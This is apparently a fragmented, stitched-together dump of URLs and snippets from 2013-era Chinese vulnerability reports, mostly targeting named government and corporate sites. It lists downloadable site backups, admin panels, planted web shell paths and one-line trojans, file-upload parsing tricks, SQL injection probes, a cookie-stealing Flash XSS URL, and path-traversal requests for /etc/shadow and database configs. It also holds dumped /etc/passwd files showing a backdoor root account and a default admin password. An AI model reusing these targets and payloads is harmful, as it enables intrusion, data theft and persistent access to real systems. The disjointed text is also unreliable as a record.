http://xxcyj.jingmen.gov.cn/xxcyj.rar http://sy.czbanbantong.com/index.action http://gbook.gscn.com.cn/liebiao.php?yid=86 http://www.chwgx.gov.cn/chwgx.rar http://www.hedalu.gov.cn/index.action http://www.smartercu.com/tmp/index.action http://bnz.cq.gov.cn/bnz.cq.gov.cn.rar http://www.sqagri.gov.cn/database.rar http://sport.maoming.gov.cn/db.rar http://www.zsb.pudong-edu.sh.cn/CenterWeb/gkxx/info.asp?id=1261 http://www.365fanyi.com/ http://www.lbny.gov.cn/www.rar http://www.jxycagri.gov.cn/web.rar http://cbj.sh.gov.cn http://wgxj.hx.gov.cn/wwwroot.zip http://www.rdagri.gov.cn/www.rdagri.gov.cn.rar http://www.mxagri.gov.cn/web.rar http://www.smag.gov.cn/admin.rar http://www.qzymj.gov.cn http://www.qzymj.gov.cn/fuck.asp http://www.qzymj.gov.cn/80sec.asp http://www.qzymj.gov.cn/dama.aspx http://www.qzymj.gov.cn/r00ts.aspx http://tzy.zynews.com/index.php?action=index&hot=9 http://www.xj-agri.gov.cn/web.zip http://tour.zynews.com/ http://tour.zynews.com/car/jiejiline.asp?startregionid=5931&endregionid=483 http://tour.zynews.com/car/songjiline.asp?startregionid=483&endregionid=5931 http://tour.zynews.com/car/shangwu.asp?cityid=321 http://tour.zynews.com/hotel/station.asp?cityid=53&labelid=21922&order_s=distance&page=0 http://url.114la.com/?ac=url_details&id=85567 www.uwan.com http://qx.uwan.com/data/mysql_error_trace.inc http://qx.uwan.com/ http://qx.uwan.com/qx_uwan_admin/login.php http://lun.uwan.com/lun_uwan_admin/login.php http://wz.uwan.com/wz_uwan_admin/login.php http://xia.uwan.com/xia_uwan_admin/login.php http://tvs.tcl.com/admin/admin.rar可直接下载源代码 http://smarthome.tcl.com/manager/ http://www.sxfs.gov.cn/1.rar http://www.smgt.gov.cn/smgt.rar http://www.motel168.com/ShowHotelImage.aspx?type=1 http://www.hagt.gov.cn/wwwroot.rar http://www.scncaj.gov.cn/data.rar http://aqjd.kscein.gov.cn/bak/web.rar http://www.zjajj.gov.cn/db.zip http://www.jnzfcg.gov.cn/root.zip http://218.30.21.104/jfpt_akzyjsxy/logon.action http://218.30.21.104/jfpt_akzyjsxy/jfpt_test.jsp 
http://hi.189.cn/service/bill/accountBill_product.jsp?prodnum=88359543&prodcode=167987957&month=201305&querymod=2&citycode=0898&prodid=1 http://hi.189.cn/service/bill/accountBill_product.jsp?prodnum=88359563&prodcode=167987957&month=201305&querymod=2&citycode=0898&prodid=1 http://www.dzgt.gov.cn/dzgt.rar http://www.bhgtj.gov.cn/data.rar http://gtzy.gongyi.gov.cn/gtzy.rar http://www.jxgtzyj.gov.cn/1.rar http://ezguotu.ezhou.gov.cn/database.rar http://www.zcajj.gov.cn/zcajj.rar http://www.syland.gov.cn/syland.rar http://www.hebigt.gov.cn/2.rar http://www.hyxgtj.gov.cn/web.rar http://61.158.236.33:8080/phy/index.do site:shenzhoufu.com http://www.xtxgtj.gov.cn/www.xtxgtj.gov.cn.rar http://www.xinzhoulr.gov.cn/root.zip http://www.ahtcgtj.gov.cn/ahtcgtj.rar http://www.binzhouipo.gov.cn/web.rar http://www.jnzj.gov.cn/wwwroot.zip http://www.jnzj.gov.cn/inc.asp http://home.fenggang.gov.cn/home.rar http://job.tianji.com/resume/campaign/register/310%3A3775716 http://www.pzhmf.gov.cn/data.rar http://www.gzjssafety.gov.cn/2.rar http://www.ycfcglj.gov.cn/wwwroot.rar http://ajj.jiangyin.gov.cn/bak.rar http://www.czfdc.gov.cn/data.rar http://www.lxrf.gov.cn/lxrf.rar http://www.srsrf.gov.cn/srsrf.zip http://www.lyghbc.gov.cn/lyghbc.rar http://user.sanwen8.cn/do/postmessage?tuid=223669 http://jswater.jinshan.gov.cn/jswater.jinshan.gov.cn.rar http://www.jnnj.gov.cn/data.rar http://en.ex-silver.com/products.php?id=1 http://en.ex-silver.com/system/ http://www.ncosm.gov.cn/ncosm.rar http://phpweb.99idc.cn/webmall/query.php?catid=1 http://fzgl.fjzfcg.gov.cn/2.rar http://kjrck.cstc.gov.cn/index.do http://ehr.tcl.com/ehr http://ehr.tcl.com/ehr?Pswrd=a&Pernr=a http://cts.tcl.com/,围观绩效? 
http://121.193.130.60/cetphoto/photo/3013201001.jpg http://fhyf.kmjy.gov.cn/wwwroot.zip http://118.145.26.210/feature/showTimeByCineam.aspx?placeNO=11064201&Date=2013-09-28 http://szyb.hyyb.gov.cn/szyb.rar http://www.zssf.gov.cn/1.rar http://www.ybnj.gov.cn/ybnj.rar http://www.hbsea.gov.cn/database.zip http://mall.baomihua.com/person/address.aspx?id=1550 http://test.baidu.com/crowdtest/n/bug/index/proid/5027 http://www.zjda.gov.cn:83/gate/big5/www.80sec.com/ http://www.hljts.gov.cn/web/ http://www.qgnet.gov.cn/gfql http://www.wsxtj.gov.cn/images/includes.asp?tid_%A1%BE%D5%FD%C6%B7%A1%BFlamp%BC%BC%CA%F5%BE%AB%C6%B7%CA%E9%C0%C8%A3%BAapache%C4%A3%BF%E9%BF%AA%B7%A2%D6%B8%C4%CF%20%2Fnickkew%D5%C5%C1%A2%C7%BF.htm http://www.lndangan.gov.cn/yydj1/ http://www.hffx.gov.cn/images/ http://service.whst.gov.cn:81/。所有网站整站备份,重要数据泄漏。 http://www.yxjcy.gov.cn/manager/ http://218.204.223.135/Home/Login?ReturnUrl=%2f http://218.14.88.20/DRP/login.action(TCL员工直销订单管理系统) http://218.14.88.9/DRP/login.action(商用系统分销资源管理系统5.0) http://218.14.88.13/DRP/login.action(ROWA分销资源管理系统5.0) http://ah.189.cn/shop/userCenter/myAddress!initUpdate.action?deliveryAddress.id=1738172 http://application.dodopal.com:9997/fapayn/querybill.action http://www.tcl.com/service/qut/p/qut.html http://www.tcl.com/service/qut/p/qut.html http://www.mhaier.cn/jxs_query/page.action http://learning.ceair.com http://learning.ceair.com/ilearn/en/learner/jsp/user_home/jsp/my_underling_details.jsp?id=100227 http://office.homeinns.com/staffinfo/ http://office.homeinns.com/staffinfo/hrDetail.aspx?Type=8 www.homeinns.com/ewebeditor/admin/login.jsp http://sz.esf.sina.com.cn/ad?p=100 http://b2b.zon100.com http://cglogin.zon100.com http://club.zon100.com http://gys.zon100.com http://login.zon100.com http://member.zon100.com http://wap.zon100.com http://b2b.zon100.com http://cglogin.zon100.com http://club.zon100.com http://gys.zon100.com http://login.zon100.com http://member.zon100.com http://wap.zon100.com 
http://login.zon100.com/member/loginAction_toLogin.do http://cglogin.zon100.com/front/detailZ-getDetailZs.do http://sqsvc.btte.net/self-service/udr.do?method=QueryForList http://points.zon100.com/points/pointsAction_mall.do http://tp2.sinaimg.cn/ http://2.eboss.cn/ http://www.fengyunzhibo.com/,打开源码,发现用的是云成互动的服务。于是手贱打开了下。发现了这个漏洞。 http://www.kukuplay.com/imgup/ http://static.ws.kukuplay.com/imgup//help.php http://appstore.gk.sdo.com http://www.zon100.com/product/priceAdvice.do root:x:0:0:root:/root:/bin/bash bin:x:1:1:bin:/bin:/sbin/nologin daemon:x:2:2:daemon:/sbin:/sbin/nologin adm:x:3:4:adm:/var/adm:/sbin/nologin lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin sync:x:5:0:sync:/sbin:/bin/sync shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown halt:x:7:0:halt:/sbin:/sbin/halt mail:x:8:12:mail:/var/spool/mail:/sbin/nologin news:x:9:13:news:/etc/news uucp:x:10:14:uucp:/var/spool/uucp:/sbin/nologin operator:x:11:0:operator:/root:/sbin/nologin games:x:12:100:games:/usr/games:/sbin/nologin gopher:x:13:30:gopher:/var/gopher:/sbin/nologin ftp:x:14:50:FTP User:/var/ftp:/sbin/nologin nobody:x:99:99:Nobody:/:/sbin/nologin nscd:x:28:28:NSCD Daemon:/:/sbin/nologin vcsa:x:69:69:virtual owner:/dev:/sbin/nologin pcap:x:77:77::/var/arpwatch:/sbin/nologin rpc:x:32:32:Portmapper user:/:/sbin/nologin mailnull:x:47:47::/var/spool/mqueue:/sbin/nologin smmsp:x:51:51::/var/spool/mqueue:/sbin/nologin ntp:x:38:38::/etc/ntp:/sbin/nologin sshd:x:74:74:Privilege-separated SSH:/var/empty/sshd:/sbin/nologin rpcuser:x:29:29:RPC User:/var/lib/nfs:/sbin/nologin nfsnobody:x:4294967294:4294967294:Anonymous User:/var/lib/nfs:/sbin/nologin dbus:x:81:81:System bus:/:/sbin/nologin haldaemon:x:68:68:HAL daemon:/:/sbin/nologin avahi:x:70:70:Avahi daemon:/:/sbin/nologin avahi-autoipd:x:100:101:avahi-autoipd:/var/lib/avahi-autoipd:/sbin/nologin xfs:x:43:43:X Server:/etc/X11/fs:/sbin/nologin gdm:x:42:42::/var/gdm:/sbin/nologin sabayon:x:86:86:Sabayon user:/home/sabayon:/sbin/nologin 
apache:x:48:48:Apache:/var/www:/sbin/nologin bingdao:x:0:0:root:/home/bingdao:/bin/bash http://ehr.91yong.com/html/user/login.html http://121.207.254.153/1.0v/rccool/login.html http://yglz.tousu.hebnews.cn/Outside/msglist_s.aspx?mt=1 http://223.252.192.37/ https://online.unionpay.com/new-pandora/t1/showPage.do https://partner.maxthon.com/index.php https://partner.maxthon.com/index.php?type_black=Y&type_white=&index=2&keyword=edu https://partner.maxthon.com/index.php?type_black=Y&type_white=&index=2&keyword=edu http://partner.maxthon.com/rnd.action http://data.sports.sohu.com http://ecard.gdbnet.cn/login.jspx http://ecard.gdbnet.cn/css.jsp http://ecard.gdbnet.cn/login.jspx http://code.fangwei315.com/caimacode.aspx?key=123456789090 https://42.96.192.111/backup/ http://blog.mrobay.com/blog/wp-login.php http://passport.58.com https://42.96.192.111/backup/ http://www.qgrmbszx.cn/indexAction.action http://u.china.com/group/?_a=taglist_group&node_type=4 http://www.china-crc.com.cn/index.php/changpiandg/detail/pid/08/id/8 http://www.china-crc.com.cn/index.php/changpiandg/detail/pid/08/id/8 http://job.gome.com.cn/ www.dangao.com/help.php http://123.234.41.57/ http://112.64.122.203/meeting/app/meetinglist/todayDataList.action?site=box&portalLocale=zh_CN&menuname=24000_24001_24002 http://search.szfw.org/entry.php?action=getUserinfo2&userId=2-1 http://search.szfw.org/entry.php?action=getUserinfo2&userId=2 http://search.szfw.org/entry.php?action=getPwdpage可用于修改其密码。 http://search.szfw.org/entry.php?action=getUserinfo2&userId=2 http://suanming.kaiyun.china.com http://ued.sina.com.cn/ http://udc.weibo.com http://mux.baidu.com/ http://ued.baidu.com http://ued.focus.cn/ http://blog.19ued.com/ http://www.aliued.com/ http://www.aliued.com/?author=1 http://www.aliued.com/wp-login.php http://112.124.3.235:88/zte/index!loginout.action http://t.nextsns.com http://www.yst.com.cn/app/yst_index.action http://www.111g.com/?ct=news&ac=info&id=54617 http://www.111g.com/admin/ localhost:scan 
http://cbvideo.chinese.cn/index.action http://61.50.156.38/ http://www.aliued.com/panda/ http://www.aliued.com/panda/?author=1 http://www.aliued.com/panda/?author=100 http://www.aliued.com/panda/wp-login.php http://zhi.etao.com/wp-login.php http://w5cdn.ranktv.cn/dotnet/20130418/ueditor/ubb.min.js http://www.multibuy.cn/index.php?act=member_snsfriend&op=find http://www.xxx.com/home.php?mod=spacecp&ac=favorite&type=forum&id=2&handlekey=favoriteforum&infloat=yes&handlekey=a_favorite&inajax=1&ajaxtarget=fwin_content_a_favorite http://www.cswater.gov.cn/house/web.php?username=admin http://www.nh-fda.gov.cn/CmsEditor/Admin_Login.asp www.familydoctor.com.cn http://ask.familydoctor.com.cn/upimg.aspx http://ask.familydoctor.com.cn/UploadFile/TopicImg/20130928/0928095805104.aspx http://univ.zte.com.cn/ZteTrain/CustomerTrain/InviteLetter.aspx?pid=DTSH2010101001TCPR10&classid=11NURRC201 http://www.hunanzhuzhou.gov.cn/comm/common/appendix/20130928060539179.jsp http://www.xysvb.com/ http://www.xysvb.com/plus/90sec.php http://z.xywy.com/index.php?a=interviewReply&limit=6/*!50056aaaa*/ http://z.xywy.com/index.php?a=interviewReply&limit=6/*!50086aaaa*/ http://z.xywy.com/index.php?a=interviewReply&limit=6/*!50092aaaa*/ http://z.xywy.com/index.php?a=interviewReply&limit=6/*!50093aaaa*/ http://www.hdzj.gov.cn/read_news.php?id=648 http://web.jlnu.edu.cn/50jlnu/foundation/display.php?id=23 http://www.hnxfw.gov.cn/news_text.php?id=11550 http://tech.hebei.com.cn/pd/product/quitmarket.do http://www.lilifan.com//shop/index_new!ajaxCheck.action http://wenxue.xzjw.gov.cn/admin/ http://10w.u17.com/ http://www.soso.com/q?pid=s.idx&cid=s.idx.se&w=intitle%3A%BE%C6%B5%EA%B6%A9%B5%A5%CF%EA%C7%E9 http://www.soso.com/q?sc=web&bs=intitle%3A%BE%C6%B5%EA%B6%A9%B5%A5%CF%EA%C7%E9&ch=w.uf&num=10&w=intitle%3A%BE%C6%B5%EA%B6%A9%B5%A5%CF%EA%C7%E9+site%3Ahotels.ctrip.com site:hotels.ctrip.com http://land.tcl.com http://land.tcl.com:80/Default.aspx 
http://www.hnsyczj.gov.cn/comm/common/appendix/20130928050554437.jsp http://112.124.3.106:8080/ http://book.cnxianzai.com/search.php?searchType=3&keyword=%B3%A4%BD%AD%CE%C4%D2%D5 http://trip.gansudaily.com.cn/hotel/HotSceneryAjax.asp?p1=ShangHai&p2=ShangHai&p3=BaiYunGuan&page=1 http://mms.hb.vnet.cn:8088/sp/getlistapp.do http://www0.ceair.com/muecard/sales/b2c/QueryAction.do?method=doView&id=201004301010460672 http://www.hnwstj.com/ http://www.hnwstj.com/downloadfile.asp?id=70 inurl:lmsv5/login!loginIndexPage.action http://58.214.233.113:8800/lmsv5/login!loginIndexPage.action http://60.216.4.162:9091/lmsv5/login!loginIndexPage.action http://139.210.99.46:8080/lmsv5/login!loginIndexPage.action http://brio.tcl.com.cn/data/ http://brio.tcl.com.cn:80/data/ http://search.sh.ct10000.com/cpn/sys/list.action http://www.rc.gov.cn/comm/common/appendix/20130928052022909.jsp http://ego.tcl.com.cn/DRP/ http://ego.tcl.com.cn/DRP/login.action存在最新的ST2漏洞导致getshell。 http://ego.tcl.com.cn/DRP/shell.jsp http://rc.gpt.gov.cn/ http://rc.gpt.gov.cn/system_dntb/upload/temp_1.cdx;1..jpg http://rc.gpt.gov.cn/system_dntb/upload/temp_temp_b.cdx;1..jpg http://rc.gpt.gov.cn/system_dntb/temp_a.cdx;1..jpg http://www.fangxian.gov.cn/user/login.aspx http://dzjc.zhengzhou.gov.cn/indexAction.action root:x:0:0:root:/root:/bin/bash bin:x:1:1:bin:/bin:/sbin/nologin daemon:x:2:2:daemon:/sbin:/sbin/nologin adm:x:3:4:adm:/var/adm:/sbin/nologin lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin sync:x:5:0:sync:/sbin:/bin/sync shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown halt:x:7:0:halt:/sbin:/sbin/halt mail:x:8:12:mail:/var/spool/mail:/sbin/nologin news:x:9:13:news:/etc/news uucp:x:10:14:uucp:/var/spool/uucp:/sbin/nologin operator:x:11:0:operator:/root:/sbin/nologin games:x:12:100:games:/usr/games:/sbin/nologin gopher:x:13:30:gopher:/var/gopher:/sbin/nologin ftp:x:14:50:FTP User:/var/ftp:/sbin/nologin nobody:x:99:99:Nobody:/:/sbin/nologin zabbix:x:100:101:Zabbix System:/var/lib/zabbix:/sbin/nologin 
vcsa:x:69:69:virtual owner:/dev:/sbin/nologin oprofile:x:16:16:Special OProfile:/home/oprofile:/sbin/nologin nscd:x:28:28:NSCD Daemon:/:/sbin/nologin ais:x:39:39:openais Framework:/:/sbin/nologin distcache:x:94:94:Distcache:/:/sbin/nologin pcap:x:77:77::/var/arpwatch:/sbin/nologin ldap:x:55:55:LDAP User:/var/lib/ldap:/bin/false apache:x:48:48:Apache:/var/www:/sbin/nologin rpc:x:32:32:Portmapper user:/:/sbin/nologin amanda:x:33:6:Amanda user:/var/lib/amanda:/bin/bash quagga:x:92:92:Quagga suite:/var/run/quagga:/sbin/nologin postgres:x:26:26:PostgreSQL Server:/var/lib/pgsql:/bin/bash mailnull:x:47:47::/var/spool/mqueue:/sbin/nologin smmsp:x:51:51::/var/spool/mqueue:/sbin/nologin hacluster:x:511:90::/home/hacluster:/bin/bash mailman:x:41:41:GNU Manager:/usr/lib/mailman:/sbin/nologin webalizer:x:67:67:Webalizer:/var/www/usage:/sbin/nologin privoxy:x:73:73::/etc/privoxy:/sbin/nologin dovecot:x:97:97:dovecot:/usr/libexec/dovecot:/sbin/nologin radvd:x:75:75:radvd user:/:/sbin/nologin squid:x:23:23::/var/spool/squid:/sbin/nologin mysql:x:27:27:MySQL Server:/var/lib/mysql:/bin/bash postfix:x:89:89::/var/spool/postfix:/sbin/nologin dbmail:x:101:102:DBMail Account:/var/lib/dbmail:/sbin/nologin cyrus:x:76:12:Cyrus Server:/var/lib/imap:/bin/bash ident:x:98:98::/:/sbin/nologin dbus:x:81:81:System bus:/:/sbin/nologin avahi:x:70:70:Avahi daemon:/:/sbin/nologin ntp:x:38:38::/etc/ntp:/sbin/nologin rpcuser:x:29:29:RPC User:/var/lib/nfs:/sbin/nologin nfsnobody:x:4294967294:4294967294:Anonymous User:/var/lib/nfs:/sbin/nologin sshd:x:74:74:Privilege-separated SSH:/var/empty/sshd:/sbin/nologin haldaemon:x:68:68:HAL daemon:/:/sbin/nologin named:x:25:25:Named:/var/named:/sbin/nologin radiusd:x:95:95:radiusd user:/home/radiusd:/sbin/nologin xfs:x:43:43:X Server:/etc/X11/fs:/sbin/nologin bingdao:x:0:0::/home/bingdao:/bin/bash http://yzu.pigai.org/public/themes/classic/.svn/entries http://yzu.pigai.org/.svn/entries http://svn.jukuu.com:6666/svn/yzu.pigai.org/public/themes/classic 
site:learning.ceair.com http://www.jukuu.com/help.php http://99inn.cc/PerVip.aspx?tid=1 http://tvs.tcl.com/main/Login.aspx http://hq.gdgs.gov.cn:6888/admin/protected/index.jsp http://www.semirbiz.com/cn/career/campus-recruitment-semir-list.aspx?cityid=10 http://v.qq.com/p/tv/zt/ywaq/index.html http://www.qq.com/coral/coralCommentDome.htm http://union.ceair.com/Login.aspx http://www.csmap.gov.cn/iportal/iportalIndex.action http://www.mapjs.com.cn/indexopen.action http://zbgtj.gov.cn/iportal/iportalIndex.action http://www.shanghai-map.net:8080/shmap/randimg2.action http://www.xzmap.gov.cn/indexopen.action http://wx.233.com/Search/school/ddkde233Dexffdbvddfd11/aaammmdddffggddk/ddf3233dfdooqnmb.asp http://biz.finance.sina.com.cn/search/product/detail_card.php?id=2 http://www.yqkq.gov.cn/FCKeditor/editor/filemanager/browser/default/browser.html?Type=Image&Connector=/FCKeditor/editor/filemanager/connectors/aspx/connector.aspx http://art.dahe.cn/mingjia/roomview.php?id=30 http://shequ.szsi.gov.cn:9080/CommunityWeb/login.jsp http://125.39.193.241:8080/admin.action?s=login http://www.ciqpt.gov.cn/admin/uploadfile.asp http://www.ciqpt.gov.cn/uploadfiles/201310/20131011519745.asp http://cts.tcl.com http://cts.tcl.com http://oa.yhjs.gov.cn/wssl/upload.jsp http://oa.yhjs.gov.cn/wssl/wssl.jsp http://oa.yhjs.gov.cn/wssl/upload/201308202217427770642804940000000001/silicl.jsp http://game.jinti.com/ https://vpn.catr.cn http://yzpf.gov.cn/system_dntb/uploadimg.aspx http://yzpf.gov.cn/system_dntb/upload/eWebErditor.asp;1.jpg?gl=file http://www.xhgtj.gov.cn/system_dntb/uploadimg.aspx http://www.xhgtj.gov.cn/system_dntb/upload/a.asa;1.jpg http://www.xt-safety.gov.cn/system_dntb/uploadimg.aspx http://www.xt-safety.gov.cn/system_dntb/upload/za.asp;1.jpg http://www.dwxcb.gov.cn/system_dntb/uploadimg.aspx http://www.dwxcb.gov.cn/system_dntb/upload/a.asa;1.jpg http://xxx.gov.cn/system_dntb/uploadimg.aspx http://www.dedecms.com/images/swfupload/swfupload.swf 
https://nealpoole.com/blog/2012/05/xss-and-csrf-via-swf-applets-swfupload-plupload/ http://www.dedecms.com/images/swfupload/swfupload.swf?movieName=%22]%29}catch%28e%29{if%28!window.x%29{window.x=1;alert%28document.cookie%29}}// http://bbs.ztems.com/.svn/entries http://www.zhongxingfans.com/ http://www.zhongxingfans.com/robots.txt/1.php http://www.zhongxingfans.com/data/attachment/group/00/group_610_banner.jpg/1.php一句话马。 http://ssqj.qiye.ikanshu.cn/ ctrip.csdn.net/.svn/entries http://bbs.qrobot.qq.com http://1.com\u0022\u003e\u003c\u0069\u0066\u0072\u0061\u006d\u0065\u002f\u006f\u006e\u006c\u006f\u0061\u0064\u003d\u0061\u006c\u0065\u0072\u0074\u0028\u0031\u0029\u003e/1.swf http://cwgk.taoyuan.gov.cn/user/login.aspx http://www.jxxzfgj.gov.cn/user/login.aspx trswcm:UploadService www.catr.cn SOAP-ENV:Envelope xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/ xmlns:soap="http://schemas.xmlsoap.org/wsdl/soap/ xmlns:xsd="http://www.w3.org/1999/XMLSchema xmlns:xsi="http://www.w3.org/1999/XMLSchema-instance xmlns:m0="http://tempuri.org/ xmlns:SOAP-ENC="http://schemas.xmlsoap.org/soap/encoding/ xmlns:urn="http://www.catr.cn/wcm/services/trswcm:UploadService SOAP-ENV:Header/ SOAP-ENV:Body SOAP-ENV:Body http://www.catr.cn/zhaopin_society/regist.action http://zaozhuang.cyberpolice.cn:8080/admin_main.asp http://www.jiaxing.cyberpolice.cn/manage/ http://www.zhoushan.cyberpolice.cn/manage/index.jsp http://huhehaote.cyberpolice.cn/test.txt http://an.cyberpolice.cn http://202.100.246.16/netalarm/auth/login!loginFail.action whoami:fenghuoroot http://122.225.18.142/reg/reguser!register2Input.do position:absolute;width:100%;height:300%;background-color vertical-align:top http://wh.bbs.house.sina.com.cn/5790475176307092475/thread.html http://www.lysgzcx.hnloudi.gov.cn/GuestBook/yjjy.asp?ID=2330 http://www.jxweisheng.gov.cn/gw1/admin.asp http://www.jxweisheng.gov.cn/gw1/admin.asp http://bsfw.hebds.gov.cn/wbcms/ls/lsAction.do 
dir:/oracle/middleware/user_projects/domains/bsfw_domain/applications/wbcms dir:/oracle/middleware/user_projects/domains/bsfw_domain/applications/wbcms http://ndj.gdwater.gov.cn/Login.aspx http://www.ahpost.com.cn/com/viewnews.php?newsid=6578 http://www.onefoundation.cn/bbs.zip f.xunlei.com/.svn/entries http://pim.lenovo.com http://pim.lenovo.com/contact/portal/index.html http://pim.lenovo.com/contact/contact/portal/create/contact http://crm.tcl.com.cn/DRP/login.action shell:http://crm.tcl.com.cn/DRP/shell.jsp http://www.nxxy.gov.cn:81/manage/index.asp http://www.nxxy.gov.cn:81/fckeditor/editor/filemanager/browser/default/browser.html?Type=Image&Connector=/fckeditor/editor/filemanager/connectors/asp/connector.asp&From=inner&value= http://www.chinafoodsltd.com:8080/IR/noticeDetail.jsp?ID=310 http://pan.suning.com http://www.xf9999.com/ http://3w.rayli.com.cn/countpage/countpage.aspx?pag http://down.rayli.com.cn/emag/rayli_shang086.rar www.wip.wealink.com www.wip.wealink.com www.wip.wealink.com www.wip.wealink.com www.wip.wealink.com www.wip.wealink.com www.wip.wealink.com www.wip.wealink.com www.wip.wealink.com www.wip.wealink.com include:spf.mail.qq.com www.wip.wealink.com www.wip.wealink.com www.wip.wealink.com www.wip.wealink.com www.wip.wealink.com include:mail.71inc.co include:222.66.48.26 www.wip.wealink.com include:spf.mail.qq.com www.wip.wealink.com www.wip.wealink.com www.wip.wealink.com http://a.xunlei.com)由于管理疏忽,导致.svn/entries等泄露重要数据,包括用户名、SQL数据可直接下载(明文显示)!剩下的就不再继续渗透了,估计情况要比我想像的复杂!!!国庆期间,网络安全更不容忽视! 
http://wcm.moc.gov.cn:9000/wcm/,漏洞详情参见 http://lxj.ecare365.com/HelpDetail.php?id=60000139 http://lexue.lenovo.com.cn/lms/pages//login.htm http://zhi.lenovo.com.cn/fy12pk/arena/arena_login.php http://zhi.lenovo.com.cn/fy12pk/pk_login.php?url=Z2FtZS8% http://lelink.ecare365.com/manage/ http://dyxyedu.net/index.php/News/detail?id=31 http://www.97zh.com/?ct=product&do=do http://www.97zh.com/?ct=product&goods_id=134 http://www.97zh.com/admin/index.php http://211.100.40.155/website/applyCollectWebsite.action http://z.yy.com/zone/square.do http://222.66.202.21/ http://m.coolmart.net.cn/ http://www.masrcb.com/masrcb.rar http://bbs.siteserver.cn/bbs.rar http://www.189180.net/ComIndex/Register http://elckj.gov.cn/syWebEditor/UpImg.asp http://www.ahqybb.gov.cn/syWebEditor/UpImg.asp http://service.zj.chinamobile.com/service.zip http://www.10086.cn/support/focus/suggest/index.htm http://bj.dm.wo.com.cn/ http://bj.dm.wo.com.cn/Aset2/androidblue/home/Home.action http://222.68.185.242:7080/mobileWT2/jwificheck.do http://beian.usernet.com.cn/user/gotoLoginPage.action http://beian.e-icann.com/user/gotoLoginPage.action http://beian.idcs.cn/user/gotoLoginPage.action http://beian.ccme.cc/user/gotoLoginPage.action http://beian.east.net/user/gotoLoginPage.action baidu:gotoLoginPage.action http://www.dh365.gov.cn/navi/dh/index.action http://www.ahnx.cn/console/login/LoginForm.jsp,通用的默认用户admin,默认口令12345678 http://www.crssg.com/qyglshow.php?list=834 http://mz.5see.com/Search.aspx?key= http://mm.5see.com/Search.aspx?key= http://cadmin.aqgj.cn cadmin.aqgj.cn/.svn/entries http://www.hbxz.gov.cn/common/common_info.action?wid=201211271614571107 http://live4.sports.tom.com/ live4.sports.tom.com/.svn/entries http://live4.sports.tom.com/Admin_Cron.html http://www.6173.com/ http://www.6173.com/index.php?s=/Index/artice/id/293 http://oa.6199.com/admin/fckeditor/editor/filemanager/connectors/test.html http://oa.6199.com//uplode/image/2.gif/.php 
http://edu.533.com/uploads/userup/393/3930F01010P0000P16.gif/.php http://search.kanglu.com/images/Klogo.jpg/.php www.miduo360.com http://www.fengyunzhibo.com/admin/feedback/copyrightFeedback.jsp http://www.fengyunzhibo.com/admin/feedback/copyrightFeedback.jsp直接进来。。 http://www.wooyun.org/bugs/wooyun-2013-038867/trace/4364ee6cc9e3c4285edfd302f4b6d54d position:absolute;width:100%;height:300%;background-color vertical-align:top http://bbs.qrobot.qq.com/thread-15495-2-1.html http://qzs.qq.com/snsapp/app/bee/widget/jump.htm?url=http://tk3333.com/ http://qzs.qq.com/snsapp/app/bee/widget/jump.htm?url=http://t.cn/SJHfpK http://jzcs.cdnhost.cn/news/html/?'5560.html https://www.trustcenter.de/RetailStore/jil/ChooseProduct!input.action http://reg.eset.com.cn/info.php http://reg.eset.com.cn/phpinfo.php http://sample.eset.com.cn/phpinfo.php http://nod32v2actsrv.eset.com.cn/www/i.php http://nod32v2actsrv.eset.com.cn/v1/i.php http://verify.eset.com.cn/inf.php http://faq.eset.com.cn/editor/filemanager/connectors/test.html http://www.eset.com.cn//uploadfile/2013/0607/1.txt http://eoffice8.weaver.cn:8028/login.php http://eoffice8.weaver.cn:8028/inc/attach.php?OP=1&ATTACHMENT_NAME=index.php&ATTACHMENT_ID=5402024843 http://www.showmycode.com/中可以解密) http://eoffice8.weaver.cn:8028/inc/attach.php?OP=1&ATTACHMENT_NAME=../../inc/oa_config.php&ATTACHMENT_ID=5402024843 http://eoffice8.weaver.cn:8028/inc/attach.php?OP=1&ATTACHMENT_NAME=../../mysql_config.ini&ATTACHMENT_ID=5402024843 http://eoffice8.weaver.cn:8028/attachment/2506423447/conf1g.php4 site:gov.cn filetype:xls http://www.ydh.cc/s/ http://www.dfyb.com.cn/newcenter/NewsCenter_List.asp?newsclass=3 http://www.dfyb.com.cn/newcenter/NewsCenter_List.asp?newsclass=2 http://www.dfyb.com.cn/sales/ProductPhoto.asp?productid=21 http://www.baidu.com/search/ressafe.html?q=%E7%99%BE%E5%BA%A6%E6%9F%90%E4%B8%80%E5%85%B3%E9%94%AE%E5%AD%97&ms=3&url=http://baike.baidu.com@google.com ftp://wfxcdj.gov.cn/ http://lms.9first.com/apply.asp?type=xz_apply 
http://www.8hy.cn:80/job_end.php?id=54 http://e-learning.lenovo.com.cn/newplayer/play/courseware_id/371 e-learning.lenovo.com.cn/newplayer/play/courseware_id/371* https://60.13.8.2//DownloadServlet?fileName=../../etc/shadow http://61.168.74.105//DownloadServlet?fileName=../../etc/shadow http://lovestep.onefoundation.cn:80/ http://www.zaojiao.com/ketang/content.php?cid=384 http://www.xuancheng.gov.cn/active/askview.php?id=67 http://183.62.214.230/StorageModel/login.action http://comm.dangdang.com/member/myfirst.php?displayid=6164454789111http://www.wooyun.org/bug/submit http://tuan.mangocity.com/product/productList.aspx?city=%E4%B8%8A%E6%B5%B7 http://www.zcf.org.cn/admin/main.htm http://gis.huizhou.gov.cn/user_registitem.action http://xzzf.gzjjjc.gov.cn:8081/dsrcy/dsrcy_dsrts.action http://slcredit.dg.gov.cn/credit/detail.action file:///mnt/sdcard/hehe.html。向天天浏览器发送请求要求打开一个页面时,即可触发 www.ccindex.cn http://www.ccindex.cn/speed/ http://club.tech.sina.com.cn position:absolute;width:100%;height:300%;background-color vertical-align:top http://124.75.29.169:8080/iptvnm/stb/update.action http://health.gzmed.gov.cn/rhin_portal/onlineAppeal.action http://service.szgas.com.cn/Guide/GuideDetail.aspx?module=4213&id=238 http://220.181.153.209:8080/manage/login.action http://220.181.153.191:8080/thirdparty/view/homepage.action http://220.181.153.192:8080/thirdparty/view/homepage.action http://220.181.153.193:8080/thirdparty/view/homepage.action http://zhibonet.com/iptv2/view/familyChannelList.action http://202.98.157.128/login/login.jsp http://club.ent.sina.com.cn/ position:absolute;width:100%;height:300%;background-color vertical-align:top http://www.sfc.sinopec.com/news/show.aspx?ID=2808013160015284680 http://mail.dnion.com/login.php?Cmd=login 